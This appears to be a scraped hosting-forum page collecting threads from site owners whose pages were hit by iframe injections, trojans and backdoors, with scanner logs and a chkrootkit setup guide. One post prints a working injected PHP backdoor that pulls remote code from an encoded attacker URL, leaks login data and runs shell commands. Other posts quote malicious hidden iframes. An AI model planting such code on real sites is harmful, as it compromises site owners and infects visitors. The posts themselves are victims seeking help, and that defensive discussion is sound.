Trojan-Clicker.HTML.Iframe.g In My Website? What Is This??
I have a website and all works fine, but an user said me that uses kaspersky said me my website has an trojan i don't understand how this is possible, and i'l really worried.
the trojan that appears to my user is:
Trojan-Clicker.HTML.Iframe.g
someone know why i have this trojan?
Now the users refuses to open my website!! i'm more than worried
this is an printscreen of the error: ...
View Complete Thread with Replies
Sponsored Links:
Related Forum Messages:
Trojan-Clicker.HTML.IFrame.amh
I am not that technically proficient so I have to resort to shared hosting solutions...I am currently with Bluehost. Problem: I have a small site with minimal needs in terms of storage and bandwidth, but the site is controversial and gets hacked and attacked a lot. I need a shared hosting provider which ranks higher than most in terms of security. Recently the site was attacked such that any user going to the site was infected with Trojan horse viruses. Donno if it's useful or not but here are the files from my PC antivirus which was infected when I went to the site with IE: File generated by Rogers Online Protection Anti-Virus C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5PG8E0SM0gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:25 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5GC9JZWI3gifimg[2].htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:27 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5QBPA1ELgifimg[1].htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:27 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE56SLECSUQgifimg[5].htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:28 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5EKTEAS82gifimg[5].htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:28 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5P5098OY4gifimg[4].htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:29 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5IPGNWAB0gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:30 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE55VT8B104gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:30 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE543XUDX83gifimg[2].htm Trojan-Clicker.HTML.IFrame.amh Quarantined 11/5/2009 12:21:31 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE56SLECSUQgifimg[5].htm Trojan-Clicker.HTML.IFrame.amh Quarantined 11/5/2009 12:22:18 AM C:Documents and SettingsuserLocal SettingsTemporary Internet
View Replies!
View Related
HTML Frammer Virus Attack On Website
I'm a web hosting reseller. I'm now running on a server, purchased from Hosterio (previously I used WebHostingBuzz). From last few months I'm facing massive virus attack on my server. There are 3-4 Joomla based websites hosted on the server. Most of them (including some non-joomla sites) are getting attacked by HTML frammer and similar viruses. In most of the cases, symptoms are, injection of hidden iframes either at the start or at the end of body tags. I kindly request the experts here to suggest me the optimum solution. What security measures should I take immediately? What are the recommended file permission and settings that can be set as a WHM account owner? What should I recommend to my clients? Please suggest. My server specs are: Linux Server, WHM-Reseller Hosting Account, Apache Web Server Running on Dedicated IP. PS: If you can suggest a tool to quickly manage file permissions (because FTP clients are taking lot of time to modify permissions of Joomla site, where number of files are more than 2000-3000) on my server, I'll be more grateful.
View Replies!
View Related
Iframe Injection
Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer. The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide... 1. The server does NOT have Joomla or Wordpress. 2. The injection seemed to hit every html page whether the page was active on the site or not. 3. The injection hit only one account. I have checked /var/log/messages and /var/log/secure and find nothing. What I don't have is proper ftp logging to determine whether the injection came from that method. Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well. I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.
View Replies!
View Related
Hidden Iframe Or Something
so when i look at my source code, i see this all the way to the bottom <iframe src="http://viewhit.biz" scrolling="no" frameborder="0" height="1" width="1"></iframe> but i never added that... and when i look at my footer file (which i include to the bottom of all my other files), its not there. even when i transfer the current one from my server, so its definetly not in that file any idea how else that could have been added, and how i can take it off. my sites also been acting kind of weird lately, scrolling all the way to the bottom any time a page loads, which is really annoying
View Replies!
View Related
Iframe And Micfo
For the second time in the last 2 months I got an iframe (leohin.com) added to a php script and index.html pages. My site is hosted on Micfo (support has disappeared recently. My last 3 tickets were unanswered). I have some newbie questions regarding those iframe injections. How do they add these ? Did they hack the host or only my website ? Anyone hosted on Micfo also got those leohin.com iframes ? Anyway I'm really disappointed by the lack of support by Micfo. I'm certainly moving soon.
View Replies!
View Related
Atack Using Iframe
I am experiencing a problem, which I think is DDoS Atack. well, what's happening is that my blog is receiving many requests to do so, asking you download the file xmlrcp.php (part of wordpress) has tried to block this URL that does inframe to receive such visits my blog, but you do not succeeded; No longer trying to block. htacess etc, nothing else's right!
View Replies!
View Related
Iframe Js Attack
It seems that one domain at a cpanel server has been inyected with some iframe code... the problem seems to be that we can not find the iframe code anywhere in the public_html directory. We already scanned the site public_html directory trying to find the js file or something that can launch the iframe but it seems to be impossible to find, also ran clamscanner in the fold without sucess. I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this? This is a RHE 4 + cPanel server, This is the iframe code: iframe width=1 height=1 src=[url]
View Replies!
View Related
<iframe> Worms
I have recently found that several of the web sites that I'm hosting on my server have worms that when you access the web sites in Internet Explorer, the antivirus is triggered. When you look an the source code there's always an iframe that loads a remote web page with a worm. Have you seen it already? How did these web sites get infected? Is there an easy way to clean them or is it the hard way? I ran a clamscan on the server and it didn't find anything
View Replies!
View Related
Iframe Injection
One of my site index page is having iframe injections. I am not sure about the reason. page is chmod to 644 under php.ini dl() is even disabled. But still person is some how able to inject iframe that redirects the page to some other url. Any suggestions how to fix that ? any mod_rewrite rule or anything for this?
View Replies!
View Related
How To Prevant Form IFRAME
I have shared hosting linux server and I have already enabled Firewall,brute-force but form the couple of weeks,I am facing such issue regarding crossside virus tags or scripts,I have already enabled Mod_security2,so can any body help me to prevent such type of iframe tags. Please let me know how to restrict or prevent "iframe" tags through Mod_security2,if any body have any specific rule for "iframe" tags,
View Replies!
View Related
Way To Prevent Iframe Attack
some sites on my server is inserted iframe code to its homepage index.php and index.html I found this topic is discussed on WHT for sometimes but no solution yet. I found a article help to solve this issue but i am lack of knowledge to understand the article. [url]
View Replies!
View Related
Hacked From Bis.iframe.ru
today all the sites with files nobody:nobidy get hacked, every files was repleaced with Code: <?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);} if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?> and a .htaccess files we have decode it the url are: htmltags.ru mshtml.ru iframe.ru we know that we should use SuExec to stop nobody files problem, but now we would a help to find where they got access, i have google and i have found this post but without solution: [url]
View Replies!
View Related
Iframe Injection And Rkhunter Warnings
I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account. Code: <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> what is the reason and how to fix that ? and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem : rkhunter results: Code: Checking system commands... Performing 'strings' command checks Checking 'strings' command [ OK ] Performing 'shared libraries' checks Checking for preloading variables [ None found ] Checking for preload file [ Not found ] Checking LD_LIBRARY_PATH variable [ Not found ] Performing file properties checks Checking for prerequisites [ Warning ] /bin/awk [ OK ] /bin/basename [ OK ] /bin/bash [ OK ] /bin/cat [ OK ] /bin/chmod [ OK ] /bin/chown [ OK ] /bin/cp [ OK ] /bin/csh [ OK ] /bin/cut [ OK ] /bin/date [ OK ] /bin/df [ OK ] /bin/dmesg [ OK ] /bin/echo [ OK ] /bin/ed [ OK ] /bin/egrep [ OK ] /bin/env [ OK ] /bin/fgrep [ OK ] /bin/grep [ OK ] /bin/kill [ OK ] /bin/login [ OK ] /bin/ls [ OK ] /bin/mail [ OK ] /bin/mktemp [ OK ] /bin/more [ OK ] /bin/mount [ OK ] /bin/mv [ OK ] /bin/netstat [ OK ] /bin/passwd [ OK ] /bin/ps [ OK ] /bin/pwd [ OK ] /bin/rpm [ OK ] /bin/sed [ OK ] /bin/sh [ OK ] /bin/sort [ OK ] /bin/su [ OK ] /bin/touch [ OK ] /bin/uname [ OK ] /bin/gawk [ OK ] /bin/tcsh [ OK ] /usr/bin/awk [ OK ] /usr/bin/chattr [ OK ] /usr/bin/curl [ OK ] /usr/bin/cut [ OK ] /usr/bin/diff [ OK ] /usr/bin/dirname [ OK ] /usr/bin/du [ OK ] /usr/bin/env [ OK ] /usr/bin/file [ OK ] /usr/bin/find [ OK ] /usr/bin/GET [ Warning ] /usr/bin/groups [ Warning ] /usr/bin/head [ OK ] /usr/bin/id [ OK ] /usr/bin/kill [ OK ] /usr/bin/killall [ OK ] /usr/bin/last [ OK ] /usr/bin/lastlog [ OK ] /usr/bin/ldd [ Warning ] /usr/bin/less [ OK ] /usr/bin/locate [ OK ] /usr/bin/logger [ OK ] /usr/bin/lsattr [ OK ] /usr/bin/lynx [ OK ] /usr/bin/md5sum [ OK ] /usr/bin/newgrp [ OK ] /usr/bin/passwd [ OK ] /usr/bin/perl [ OK ] /usr/bin/pstree [ OK ] /usr/bin/readlink [ OK ] /usr/bin/runcon [ OK ] /usr/bin/sha1sum [ OK ] /usr/bin/size [ OK ] /usr/bin/slocate [ OK ] /usr/bin/stat [ OK ] /usr/bin/strace [ OK ] /usr/bin/strings [ OK ] /usr/bin/sudo [ OK ] /usr/bin/tail [ OK ] /usr/bin/test [ OK ] /usr/bin/top [ OK ] /usr/bin/tr [ OK ] /usr/bin/uniq [ OK ] /usr/bin/users [ OK ] /usr/bin/vmstat [ OK ] /usr/bin/w [ OK ] /usr/bin/watch [ OK ] /usr/bin/wc [ OK ] /usr/bin/wget [ OK ] /usr/bin/whatis [ Warning ] /usr/bin/whereis [ OK ] /usr/bin/which [ OK ] /usr/bin/who [ OK ] /usr/bin/whoami [ OK ] /usr/bin/gawk [ OK ] /sbin/chkconfig [ OK ] /sbin/depmod [ OK ] /sbin/ifconfig [ OK ] /sbin/ifdown [ Warning ] /sbin/ifup [ Warning ] /sbin/init [ OK ] /sbin/insmod [ OK ] /sbin/ip [ OK ] /sbin/lsmod [ OK ] /sbin/modinfo [ OK ] /sbin/modprobe [ OK ] /sbin/nologin [ OK ] /sbin/rmmod [ OK ] /sbin/runlevel [ OK ] /sbin/sulogin [ OK ] /sbin/sysctl [ OK ] /sbin/syslogd [ OK ] /usr/sbin/adduser [ OK ] /usr/sbin/chroot [ OK ] /usr/sbin/groupadd [ OK ] /usr/sbin/groupdel [ OK ] /usr/sbin/groupmod [ OK ] /usr/sbin/grpck [ OK ] /usr/sbin/kudzu [ OK ] /usr/sbin/lsof [ OK ] /usr/sbin/prelink [ OK ] /usr/sbin/pwck [ OK ] /usr/sbin/tcpd [ OK ] /usr/sbin/useradd [ OK ] /usr/sbin/userdel [ OK ] /usr/sbin/usermod [ OK ] /usr/sbin/vipw [ OK ] /usr/sbin/xinetd [ OK ] /usr/local/bin/perl [ OK ] /usr/local/bin/rkhunter [ OK ] Checking for rootkits... Performing check of known rootkit files and directories 55808 Trojan - Variant A [ Not found ] ADM Worm [ Not found ] AjaKit Rootkit [ Not found ] aPa Kit [ Not found ] Apache Worm [ Not found ] Ambient (ark) Rootkit [ Not found ] Balaur Rootkit [ Not found ] BeastKit Rootkit [ Not found ] beX2 Rootkit [ Not found ] BOBKit Rootkit [ Not found ] CiNIK Worm (Slapper.B variant) [ Not found ] Danny-Boy's Abuse Kit [ Not found ] Devil RootKit [ Not found ] Dica-Kit Rootkit [ Not found ] Dreams Rootkit [ Not found ] Duarawkz Rootkit [ Not found ] Enye LKM [ Not found ] Flea Linux Rootkit [ Not found ] FreeBSD Rootkit [ Not found ] ****`it Rootkit [ Not found ] GasKit Rootkit [ Not found ] Heroin LKM [ Not found ] HjC Kit [ Not found ] ignoKit Rootkit [ Not found ] ImperalsS-FBRK Rootkit [ Not found ] Irix Rootkit [ Not found ] Kitko Rootkit [ Not found ] Knark Rootkit [ Not found ] Li0n Worm [ Not found ] Lockit / LJK2 Rootkit [ Not found ] Mood-NT Rootkit [ Not found ] MRK Rootkit [ Not found ] Ni0 Rootkit [ Not found ] Ohhara Rootkit [ Not found ] Optic Kit (Tux) Worm [ Not found ] Oz Rootkit [ Not found ] Phalanx Rootkit [ Not found ] Phalanx Rootkit (strings) [ Not found ] Portacelo Rootkit [ Not found ] R3dstorm Toolkit [ Not found ] RH-Sharpe's Rootkit [ Not found ] RSHA's Rootkit [ Not found ] Scalper Worm [ Not found ] Sebek LKM [ Not found ] Shutdown Rootkit [ Not found ] SHV4 Rootkit [ Not found ] SHV5 Rootkit [ Not found ] Sin Rootkit [ Not found ] Slapper Worm [ Not found ] Sneakin Rootkit [ Not found ] Suckit Rootkit [ Not found ] SunOS Rootkit [ Not found ] SunOS / NSDAP Rootkit [ Not found ] Superkit Rootkit [ Not found ] TBD (Telnet BackDoor) [ Not found ] TeLeKiT Rootkit [ Not found ] T0rn Rootkit [ Not found ] Trojanit Kit [ Not found ] Tuxtendo Rootkit [ Not found ] URK Rootkit [ Not found ] VcKit Rootkit [ Not found ] Volc Rootkit [ Not found ] X-Org SunOS Rootkit [ Not found ] zaRwT.KiT Rootkit [ Not found ] Performing additional rootkit checks Suckit Rookit additional checks [ OK ] Checking for possible rootkit files and directories [ None found ] Checking for possible rootkit strings [ None found ] Performing malware checks Checking running processes for suspicious files [ None found ] Checking for login backdoors [ None found ] Checking for suspicious directories [ None found ] Checking for sniffer log files [ None found ] Performing trojan specific checks Checking for enabled xinetd services [ None found ] Checking for Apache backdoor [ Not found ] Performing Linux specific checks Checking kernel module commands [ OK ] Checking kernel module names [ OK ] Checking the network... Performing check for backdoor ports Checking for UDP port 2001 [ Not found ] Checking for TCP port 2006 [ Not found ] Checking for TCP port 2128 [ Not found ] Checking for TCP port 14856 [ Not found ] Checking for TCP port 47107 [ Not found ] Checking for TCP port 60922 [ Not found ] Performing checks on the network interfaces Checking for promiscuous interfaces [ None found ] Checking the local host... Performing system boot checks Checking for local host name [ Found ] Checking for local startup files [ Found ] Checking local startup files for malware [ None found ] Checking system startup files for malware [ None found ] Performing group and account checks Checking for passwd file [ Found ] Checking for root equivalent (UID 0) accounts [ None found ] Checking for passwordless accounts [ None found ] Checking for passwd file changes [ None found ] Checking for group file changes [ None found ] Checking root account shell history files [ OK ] Performing system configuration file checks Checking for SSH configuration file [ Found ] Checking if SSH root access is allowed [ Warning ] Checking if SSH protocol v1 is allowed [ Warning ] Checking for running syslog daemon [ Found ] Checking for syslog configuration file [ Found ] Checking if syslog remote logging is allowed [ Not allowed ] Performing filesystem checks Checking /dev for suspicious file types [ None found ] Checking for hidden files and directories [ Warning ] Checking application versions... Checking version of Exim MTA [ OK ] Checking version of GnuPG [ Warning ] Checking version of Apache [ Skipped ] Checking version of Bind DNS [ OK ] Checking version of OpenSSL [ Warning ] Checking version of PHP [ OK ] Checking version of Procmail MTA [ OK ] Checking version of OpenSSH [ OK ] System checks summary ===================== File properties checks... Required commands check failed Files checked: 129 Suspect files: 6 Rootkit checks... Rootkits checked : 114 Possible rootkits: 0 Applications checks... Applications checked: 8 Suspect applications: 2 The system checks took: 3 minutes and 12 seconds All results have been written to the logfile (/var/log/rkhunter.log) One or more warnings have been found while checking the system. Please check the log file (/var/log/rkhunter.log)
View Replies!
View Related
Trojan C99Shell
I just installed zen cart on my webhosting and after few days later i saw some file written like core1405.php and when i open to view the file it is actually trojan c99shell. I have deleted all of the core file. Now how can i prevent it from happen again? Cause it is too much work to clean up the hosting server.
View Replies!
View Related
LKM Trojan?
I just installed a fresh copy of centos 4.5, updated some programs and installed chkrootkit. When i run # ./chkproc, it shows the following output: # ./chkproc You have 14 process hidden for readdir command You have 14 process hidden for ps command Searching for LKM trojans shows the following output: # ./chkrootkit -x lkm EXE 9994: /usr/sbin/named CWD 9995: /var/named EXE 9995: /usr/sbin/named CWD 9996: /var/named EXE 9996: /usr/sbin/named CWD 9997: /var/named EXE 9997: /usr/sbin/named CWD 9998: /var/named EXE 9998: /usr/sbin/named CWD 26293: /var/lib/mysql EXE 26293: /usr/sbin/mysqld CWD 26294: /var/lib/mysql EXE 26294: /usr/sbin/mysqld CWD 26295: /var/lib/mysql EXE 26295: /usr/sbin/mysqld CWD 26296: /var/lib/mysql EXE 26296: /usr/sbin/mysqld CWD 26297: /var/lib/mysql EXE 26297: /usr/sbin/mysqld CWD 26298: /var/lib/mysql EXE 26298: /usr/sbin/mysqld CWD 26299: /var/lib/mysql EXE 26299: /usr/sbin/mysqld CWD 26300: /var/lib/mysql EXE 26300: /usr/sbin/mysqld When i stop mysql and named, and run # ./chkrootkit -x lkm again, it doesn't show anything. When i turn mysql and named back on, it starts complaining about compromises again. Can it be a false alarm, or should i really be worried? What do you advise me to do now?
View Replies!
View Related
Trojan-Downloader.JS.Psyme.hz
I have an hosting account at OXEO.com and I have trojan problems on all my websites The index files of all my websites show a Trojan program called Trojan-Downloader.JS.Psyme.hz I checked my websites on Google and Google is warning users for this kind of problems for one of my websites Does anybody here has experienced the same problem?
View Replies!
View Related
How-to - Rootkit Scan (trojan Etc)
What is a rootkit? The following link is a very good read to answer that question. http://linux.oreillynet.com/pub/a/li...4/rootkit.html In Summary, a rootkit is a trojan installed on your Linux server after someone has broken into it. These files are used to cover the hackers tracks, and to give the hacker tools to do more dirty work from your server. Usage: 1. su - (change to root user) 2. mkdir /usr/local/chkrootkit 3. wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz 4. tar -xvzf chkrootkit.tar.gz 5. cd chkrootkit* 6. cp * /usr/local/chkrootkit 7. cd /usr/local/chkrootkit 8. make sense Now scan your system: 1. cd /usr/local/chkrootkit 2. ./chkrootkit chkrootkit may from time to time give false positives. If you ever get a positive or "infected hit" scan a second time. If you do get a positive hit, google the hit to research the issue and steps to correct. Part 2 - automated chkrootkit, and emailed results. I'm lazy, and like my server to do the work for me so I have it scan every day, and email me the results. Usage: 1. vi /etc/cron.daily/chkrootkit 2. add the following code. Code: #!/bin/bash (cd /usr/local/chkrootkit; ./chkrootkit -q 2>&1 | mail -s "Daily chkrootkt scan" you@yourdomain.com) 3. chmod 0755 /etc/cron.daily/chkrootkit This will email you@yourdomain.com every morning with your chkrootkit results. the -q option will only show you exploits. Removal: If you don't like getting the emails or just want to remove this from your server: 1. rm /etc/cron.daily/chkrootkit 2. rm -rf /usr/local/chkrootkit All files will now be deleted from your server.
View Replies!
View Related
15 POSSIBLE Trojan Detected WHM
i have an site on my server when i open it the kaspersky anti viruss detect there is an trojan in this site .. ( see the picture in the attachment ) and i checked the server from the whm and there is result 15 POSSIBLE Trojans Detected How i can solve this ?? and remove this trojans .
View Replies!
View Related
PHP.Backdoor.Trojan
As usually I do monthly scan to all files on my site,today I download all backup site into my PC,then scanning them using Norton Antivirus and on one site files Norton detected PHP.Backdoor.Trojan. I take a look file location and found current file with name xTgsj78Jn.txt Then I go to my server where site hosted,and i go to the directory and found file above stay on there,I try many time to delete it but always get an error message "Permission denied",I try to change permission but always returned an error. When deleted it i use command rm -r with root access,then I do ls -l and found details file like below. -rwxrwxrwx 1 nobody nobody 137787 Mar 19 20:14 xTgsj78Jn.txt* Please help me to delete this file. FYI this file uploaded to my hosting file site.
View Replies!
View Related
Possible Trojan List By WHM - Do I Need To Worry?
I ran the Trojan scan in WHM and it came up with the list below. I have a strong feeling WHM is mis-reporting these as trojans, but I thought I would ask the experts here: Scan for Trojan Horses Appears Clean /dev/stderr Scanning for Trojan Horses..... Possible Trojan - /usr/bin/cpan Possible Trojan - /usr/bin/instmodsh Possible Trojan - /usr/bin/prove Possible Trojan - /usr/bin/xmlcatalog Possible Trojan - /usr/bin/xmllint Possible Trojan - /usr/bin/xml2-config Possible Trojan - /usr/lib/libxml2.la Possible Trojan - /usr/bin/mysqlhotcopy Possible Trojan - /usr/bin/Wand-config Possible Trojan - /usr/bin/animate Possible Trojan - /usr/bin/compare Possible Trojan - /usr/bin/composite Possible Trojan - /usr/bin/conjure Possible Trojan - /usr/bin/convert Possible Trojan - /usr/bin/display Possible Trojan - /usr/bin/identify Possible Trojan - /usr/bin/import Possible Trojan - /usr/bin/mogrify Possible Trojan - /usr/bin/montage Possible Trojan - /usr/bin/curl-config Possible Trojan - /usr/bin/curl Possible Trojan - /usr/lib/libcurl.so.3.0.0 Possible Trojan - /usr/lib/python2.3/site-packages/libxml2mod.la Possible Trojan - /usr/lib/python2.3/site-packages/libxml2mod.so Possible Trojan - /usr/sbin/pureauth 25 POSSIBLE Trojans Detected Is there anything that looks fishy here?
View Replies!
View Related
Websites Infected With Trojan How To Solve?
i see my websites are infected with some trojan. there are some iframe tag simlilar to this in all index files <iframe src="http://traff<<removed>>.cn/in.cgi?27" width=100 height=80></iframe> any idea how might this iframe inserted in my codes. i have tried to format my systems and remove all saved ftp passwords , but still this virus is comming back and the strange thing is i have website on different servers infected with same virus any idea how this is happened and how to avoide this?
View Replies!
View Related
BEWARE -Sudden Iframe Injection Attacks, Catastrophic Results
All my sites on both my hosting accounts are infected with an iframe. At the end of the index.html files the malicious code just appeared...suddenly 3 weeks ago. The host blamed Joomla so I took the appropriate steps: Upgraded my Joomla to the latest version, changed the whole account username and password, changed the configuration and template to unwriteable. It stopped the injection for a few days but then it came back. I would also like to add that 2 other sites on my account, one simple index.html file and an old website I have that is totally HTML with nothing to do with Joomla also got infected. The iframe also infected a Drupal install I did as a test. So according to these fact is this a Hosting Company not taking responsibility or can a Joomla site infected spread to other normal HTML sites and different CMS's on the server? This situation is ruinning me and I strongly suspect it's a Hosting problem and not Joomla. Any expert opinions from true professionals would be appreciated because if I can prove that it's not a Joomla issue I might take legal action against the hosting company since this has cost me dozens of hours of work and several hundred dollars of lost revenue. I am attaching the iframe exploit. It installs itself on every index file...in every folder - components, mambots, ect..additionally it attaches itself on any and every kind of addon that has an index.html file.
View Replies!
View Related
Trojan Detected On Initial Load Of Site
I have 2 reseller accounts with one provider, and in the last several days I have noticed that when you visit the site for the first time, my AV software detects a trojan on the site, but the code & html files are 100% clean! I'm suspecting that there is something being injected into the scripts from the server daemons that's either running or something else. Anyone have any suggestions?
View Replies!
View Related
Prevent Of Execution Trojan Shell Scripts, Like R57shell And Other?
Which configuration for php and server that prevent execute shell scripts? Which funstions you recommend to disable? Like shell_exec, passthru, proc_open, proc_close, proc_get-status, proc_nice, proc_terminate, exec, system, suexec, popen, pclose, dl, ini_set, virtual, set_time_limit
View Replies!
View Related
/tmp/clamav-77e7bfdbb2d3872b/test2.exe: Trojan.Taskkill.A FOUND
What is the mining of following lines in temp folder. If i have been check daily /tmp folder many /tmp/clamav are presented in mail server, and occupied the large amount of space in temp folder /tmp/clamav-77e7bfdbb2d3872b/test1.exe: Worm.Mydoom.U FOUND /tmp/clamav-77e7bfdbb2d3872b/test2.exe: Trojan.Taskkill.A FOUND /tmp/clamav-77e7bfdbb2d3872b/test3.exe: Worm.Nyxem.D FOUND /tmp/malware.zip: Infected.Archive FOUND
View Replies!
View Related
Trojan Activity - Running Perl With High CPU Usage, With User Apache
Running programs named Perl with Heavy CPU usage, with the ownership of user apache. We found the problem on Fedora 3 and Fedora 6. In our case, it was the result of a Trojan activity. Quick Solution Check the cron jobs of user apache crontab -u apache -e */1 * * * * perl /tmp/.tmp/tmpfile delete the cronjob entry. Also delete the file /tmp/.tmp/tmpfile also added "apache" to the file /etc/cron.deny That's all Problem and solution in detail....
View Replies!
View Related
.html Instead .php
I want my server looking and open index.html first and after index.php, I mean if have both index.html and index.php in a folder, the index.html will be open by default . I know it name: DirectoryIndex directive ..
View Replies!
View Related
HTML CODER/DECODER
i was wondering if anyone no's of a html/php coder,and decoder via a password thats an offline app? its just ive made a script and i want it to use liencekeys for activation so i would need to encryt the code some how, does anyone no off a program that could do all of this for me?
View Replies!
View Related
Why Doesn't .html Override .php
I have a curious problem, and have scoured the net for a solution. Basically, while developing a Joomla site, I have had a standard .html holding page in place. I uploaded the Joomla site in the 'background' to continue developing the website while the holding page was in place. I always thought that .html would always display first in the browser, before index.php. However the index.php file always displays first. I've tried changing the htaccess file etc but at this point nothing seems to be working.
View Replies!
View Related
.com/.us & Htm/html
1. Are there any restrictions or special problems with hosting domains as a function of whether they are a ".com" versus a ".us" domain? 2. Are there any differences or problems when hosting domains which have index files which are htm versus html? For these items, are there good sources for detailed explanations?
View Replies!
View Related
How To Have .html Treated As .php
I have several websites running on Linux hosting with cPanel, that were developed as static .html files, where for ease of maintenance (use of includes) and future improvements I want the pages treated as .php. On one server I use, I just put: AddHandler application/x-httpd-php .html .shtml into the .htaccess file and the pages were treated as .php, exactly what I wanted. The other sites are on a cPanel reseller account at iVhosting.com. When I tried this there, it didn't work. I tried some other ideas suggested by Google, which resulted in the .php files being downloaded as text files. I contacted iVhosting support, who stated: "you will not be able to do this on our server since we use phpsuexec/suphp for more security. PHP pages have to have .php extension." So what can I do? I can't rename the pages all to .php because this would break incoming links and destroy the page's PR. Creating a permanent redirect for each page to the same name with .php extension would create a very large .htaccess and be extremely tedious to do.
View Replies!
View Related
Torjan In Html Index
in many sites in my server torjan in index.html in <ifram> how to save my server from that .js torjan and i need to ask about other thing this torjan can chang any this in backups
View Replies!
View Related
Php Parsing In Html
I want to use php code in .html extension files. I tried to accomplish this through a .htaccess file, but that did not work out. I tried to add a handler through cpanel, but it does not parse the code in the .html file. I renamed the index file to index.php and works fine. I would like to keep the .html extension. I tried several Handlers through Cpanel which all failed to work. Tried: AddHandler application/x-httpd-php .php .html and AddType application/x-httpd-php .php .html (with and without application/) and AddHandler server-parsed .html
View Replies!
View Related
AntsSoft HTML Protector,
This software is by AntsSoft "HTMLProtector is a tool that helps you protect the content of your web page by preventing others from viewing your source code. " Is anyone familiar or has had any experience with this.
View Replies!
View Related
HTTP Request For HTML Only
Is there a way to construct an HTML request so that only HTML text is returned (without images or rich media)? I assume search engines do this - how? What I'm trying to do is write an Apache module that will retrieve only text from a web site. The idea is to provide a Lynx-like experience, using Apache as a proxy between my workstation and my ISP.
View Replies!
View Related
Apache Noindex.html
I currently have a web site with an index.html file inside the Document Root. I also have the noindex.html inside the /var/www/error directory. From time to time for some reason the noindex.html shows when going to the web site even if I have the index.html file inside the Root Document.
View Replies!
View Related
Php Caching To Html, Any Better Options
Currently I cache php to html in a folder, and any time I upload index.php the whole site recaches. It also is set to a specific time such as 1 day, and the specific page will recache on someone hitting a page in 1 day from last cache. The problem is when there are thousands of people on, and the index.php is uploaded the site crashes due to connections to the database, and possibly writing to the folder as well. What is the best way to cache these files to html, and not have it crash every time I try to update things on the site. Also it needs to be something somewhat simple.
View Replies!
View Related
Sending HTML E-mail To 50,000+
I run the website, [url]and am looking for a way to send newsletters to the members of the website. There are currently over 53,000 registered members. We have tried emailing the database before using a variety of techniques but they are not all fool proof. Is there any software you could recommend or would I have to use a 3rd party provider? If so, how much would this cost (to do a weekly or monthly mailshot). The website is run on a core2duo E6750 with 4GB RAM and a 100mbps port - is this high end enough to support e-mailing this quantity of messages?
View Replies!
View Related
HTTPS Not Processing .php .html
I've just set up HTTPS on Apache (CentOS). However if I try to access the HTTPS site I just get prompted with the save as dialog to download either the .php file or .html. How do I get it to show (and process) it instead, like when accessing normally (non-ssl).
View Replies!
View Related
Unwanted Code In Index.html
I have multiple demo websites under single domain. and in each folder default page is as index.html few days back i have observed a blank space on each index.html. when i check the code then i have found an auto generated code just after the body tag in index.html. the code is as follows <div style="visibility:hidden"><iframe src="[url] Also I am getting Question marks (?) in some blank spaces in HTML preview. I have removed it but it again appears after some time. I have contacted to server support but they said that this is SQL Injection attack but there is no database connectivity involved in any of my websites.
View Replies!
View Related
Static HTML Resource Usage
I've been running website for several years, however, there's one thing that I've never quite figured, most likely because I haven't gone over to dedicated/vps yet. How much memory would a static 10kb HTML use or for that matter a PHP page (static)? I know it's quite a broad question, but I'm asking this as I might start a project and this one page may receive many hits. Oh and, would the memory usage go up if I have embedded objects from an outside source (e.g. embedded Youtube videos)?
View Replies!
View Related
|
TRACKER
